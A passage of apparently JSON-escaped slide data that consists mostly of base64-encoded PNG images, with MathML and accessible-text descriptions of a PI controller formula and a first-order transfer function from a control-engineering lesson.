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\&quot;,\&quot;slideId\&quot;:293,\&quot;accessibleText\&quot;:\&quot;T subscript i space end subscript space equals thin space tau comma space space space space space C subscript P I end subscript open parentheses s close parentheses space equals thin space k subscript p open parentheses fraction numerator tau s space plus space 1 over denominator tau s end fraction close parentheses\&quot;,\&quot;imageHeight\&quot;:29.72972972972973},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;G&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;Y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;U&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#x21D2;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mi&gt;Y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;mi&gt;U&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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